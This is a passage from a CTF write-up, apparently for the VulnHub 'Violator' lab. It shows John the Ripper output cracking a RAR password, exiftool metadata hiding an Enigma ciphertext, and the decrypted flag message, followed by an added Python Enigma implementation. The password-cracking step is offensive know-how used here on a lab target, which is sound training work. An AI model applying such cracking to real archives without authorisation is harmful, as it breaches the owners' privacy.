    Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    World in My Eyes (crocs.rar)
    1g 0:00:00:00 DONE (2018-08-07 21:20) 3.703g/s 88.88p/s 88.88c/s 88.88C/s enjoythesilence..World in My Eyes
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    
    
    • The cracked password is World in My Eyes. Don't ask how I knew to put it in the list; the plot demanded it. Next, the image's metadata.
    ➜  DOWNLOAD exiftool artwork.jpg
    ExifTool Version Number         : 11.01
    File Name                       : artwork.jpg
    Directory                       : .
    File Size                       : 183 kB
    File Modification Date/Time     : 2016:06:12 14:38:12+08:00
    File Access Date/Time           : 2018:08:07 21:23:12+08:00
    File Inode Change Date/Time     : 2018:08:07 21:23:12+08:00
    File Permissions                : rw-r--r--
    File Type                       : JPEG
    File Type Extension             : jpg
    MIME Type                       : image/jpeg
    JFIF Version                    : 1.01
    Resolution Unit                 : inches
    X Resolution                    : 300
    Y Resolution                    : 300
    Exif Byte Order                 : Big-endian (Motorola, MM)
    Image Description               : Violator
    Software                        : Google
    Artist                          : Dave Gaham
    Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Exif Version                    : 0220
    Date/Time Original              : 1990:03:19 22:13:30
    Create Date                     : 1990:03:19 22:13:30
    Sub Sec Time Original           : 04
    Sub Sec Time Digitized          : 04
    Exif Image Width                : 1450
    Exif Image Height               : 1450
    XP Title                        : Violator
    XP Author                       : Dave Gaham
    XP Keywords                     : created by user dg
    XP Subject                      : policyoftruth
    Padding                         : (Binary data 1590 bytes, use -b option to extract)
    About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
    Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Creator                         : Dave Gaham
    Subject                         : created by user dg
    Title                           : Violator
    Description                     : Violator
    Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
    Date Acquired                   : 1941:05:09 10:30:18.134
    Last Keyword XMP                : created by user dg
    Image Width                     : 1450
    Image Height                    : 1450
    Encoding Process                : Baseline DCT, Huffman coding
    Bits Per Sample                 : 8
    Color Components                : 3
    Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
    Image Size                      : 1450x1450
    Megapixels                      : 2.1
    Create Date                     : 1990:03:19 22:13:30.04
    Date/Time Original              : 1990:03:19 22:13:30.04
    ➜  DOWNLOAD 
    
    
    • The Copyright and Rights fields stand out, but the string is not base64. Then remember the lyrics file found in mg's home and the C program in af's, neither of which has been used yet.

    Lyrics:

    • Use Wermacht with 3 rotors
    • Reflector to B
      Initial: A B C
      Alphabet Ring: C B A
      Plug Board A-B, C-D
    • It looks like that C program is meant to decode this string, but it gets stuck at the rotor prompt.
    ➜  minarke-1.21 ./minarke 
    
    
    Minarke, an Enigma M4 emulator
    by John Gilbert
    
    Emulates the Kriegsmarine M4 Enigma encryption machine
    
    	Initial Setup Notes
    Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
    Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
    Ring and position settings: A-Z for each of the 4 rotors
    Reflector setting is always fixed at A.
    Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
    Hit return to end input, 11 pairs recomended for maximum security.
    Hit ESC at any time to quit.
    
    	Special Keys (during input mode)
    1: rewind one setting
    2: reset position settings
    3: new position settings
    4: new setup
    9: toggle debug
    0: show position settings
    ?: show help
    
    see http://en.wikipedia.org/wiki/Enigma_machine
    also http://www.bytereef.org/m4_project.html
    
    
    Rotors: 
    
    • Searched for an online Enigma decoder instead. The decrypted text has no word breaks so it is hard to read, but the flag was captured anyway.
    ONEFINALCHALLENGEFORYOUBGHXCONGRATULATIONSFORTHEFOURTHTIMEONSNARFINGTHEFLAGONVIOLATORILLPRESUMEBYNOWYOULLKNOWWHATIWASLISTENINGTOWHENCREATINGTHISCTFIHAVEINCLUDEDTHINGSWHICHWEREDELIBERATLYAVOIDINGTHEOBVIOUSROUTEINTOKEEPYOUONYOURTOESANOTHERTHOUGHTTOPONDERISTHATBYABUSINGPERMISSIONSYOUAREALSOBYDEFINITIONAVIOLATORSHOUTOUTSAGAINTOVULNHUBFORHOSTINGAGREATLEARNINGTOOLASPECIALTHANKSGOESTOBENRANDGKNSBFORTESTINGANDTOGTMLKFORTHEOFFERTOHOSTTHECTFAGAINKNIGHTMARE
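
The Enigma step worked through in code. This is an added example written for this page, not the page's code, the Minarke emulator or the online tool the author used. It implements the three-rotor Wehrmacht Enigma I (historical rotor and reflector wirings, ring settings, plugboard, double-stepping) and decrypts the string from the Copyright/Rights EXIF fields above. The hint file does not say which rotors to fit or which slot each goes in; the reading under which the EXIF string decrypts to the plaintext above is: rotor I in the right-hand (fast) slot, II in the middle, III on the left, the "Initial" letters A B C as the window letters of I, II, III and the "Alphabet Ring" letters C B A as their ring settings, reflector B, and the plugboard left empty (with A-B, C-D plugged in the output diverges at the first plugged letter, so whatever tool the author used was evidently never given the pairs). That reading, and the helper names, are mine.

```python
"""Enigma I (three-rotor Wehrmacht machine), written from scratch as an added
example for this write-up.  PAGE_CIPHERTEXT is copied from the EXIF fields shown
above; the settings in page_machine() are the assumed reading of the hint file."""
import string

A = string.ascii_uppercase

# wiring and turnover notch: when the window shows the notch letter and a key is
# pressed, this rotor and its left-hand neighbour both advance
ROTORS = {
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
    "IV":  ("ESOVPZJAYQUIRHXLNFTGKDCMWB", "J"),
    "V":   ("VZBRGITYUPSDNHLXAWMJQOFECK", "Z"),
}
REFLECTORS = {"B": "YRUHQSLDPXNGOKMIEBFZCWVJAT", "C": "FVPJIAOYEDRZXWGCTKUQSBNMHL"}


class Rotor:
    def __init__(self, name, position, ring):
        wiring, notch = ROTORS[name]
        self.fwd = [A.index(c) for c in wiring]
        self.inv = [self.fwd.index(i) for i in range(26)]
        self.notch = A.index(notch)
        self.pos = A.index(position)       # letter visible in the window
        self.ring = A.index(ring)          # Ringstellung: shifts the wiring against the ring

    def at_notch(self):
        return self.pos == self.notch

    def step(self):
        self.pos = (self.pos + 1) % 26

    def forward(self, c):                  # entry side towards the reflector
        o = (self.pos - self.ring) % 26
        return (self.fwd[(c + o) % 26] - o) % 26

    def backward(self, c):                 # reflector side back to the entry
        o = (self.pos - self.ring) % 26
        return (self.inv[(c + o) % 26] - o) % 26


class Enigma:
    """rotors, positions and rings are given left to right as the operator sees them."""

    def __init__(self, rotors, reflector, positions, rings, plugboard=()):
        self.left, self.middle, self.right = (
            Rotor(n, p, r) for n, p, r in zip(rotors, positions, rings))
        self.reflector = [A.index(c) for c in REFLECTORS[reflector]]
        self.plug = list(range(26))
        for pair in plugboard:             # "AB" or "A-B": swap the two letters
            x, y = (A.index(c) for c in pair.upper() if c in A)
            self.plug[x], self.plug[y] = y, x

    def _step(self):
        # Rotors move before the current flows.  The middle rotor advances when the
        # right one sits on its notch, and also when it sits on its own notch, in
        # which case the left rotor advances too (the "double step").
        if self.middle.at_notch():
            self.middle.step()
            self.left.step()
        elif self.right.at_notch():
            self.middle.step()
        self.right.step()

    def press(self, ch):
        self._step()
        c = self.plug[A.index(ch)]
        for rotor in (self.right, self.middle, self.left):
            c = rotor.forward(c)
        c = self.reflector[c]
        for rotor in (self.left, self.middle, self.right):
            c = rotor.backward(c)
        return A[self.plug[c]]

    def process(self, text):
        """Encipher or decipher (the same operation); anything but A-Z is dropped."""
        return "".join(self.press(ch) for ch in text.upper() if ch in A)


PAGE_CIPHERTEXT = (   # Copyright / Rights EXIF value from artwork.jpg, as shown above
    "UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDF"
    "RYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSK"
    "LJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUI"
    "MXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEX"
    "GPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZAR"
    "BEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI"
)


def page_machine(plugboard=()):
    """Assumed reading of faith_and_devotion: rotor I in the right-hand slot, II in
    the middle, III on the left; 'Initial' A B C are the window letters and
    'Alphabet Ring' C B A the ring settings of I, II, III; reflector B.  The page's
    plaintext only comes out with the plugboard empty, so that is the default."""
    return Enigma(("III", "II", "I"), "B", positions="CBA", rings="ABC", plugboard=plugboard)


def decrypt_page_string():
    return page_machine().process(PAGE_CIPHERTEXT)


if __name__ == "__main__":
    print(Enigma(("I", "II", "III"), "B", "AAA", "AAA").process("AAAAA"))   # BDZGO
    print(decrypt_page_string())
```

A quick sanity check for any Enigma implementation, used in the last lines: with rotors I II III, reflector B, all rings and positions at A and no plugboard, AAAAA enciphers to BDZGO. Because the machine is an involution, running the same settings over the output gives the input back, which is why one object serves for both directions.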
    
  • Original URL: https://www.cnblogs.com/Kali-Team/p/12211019.html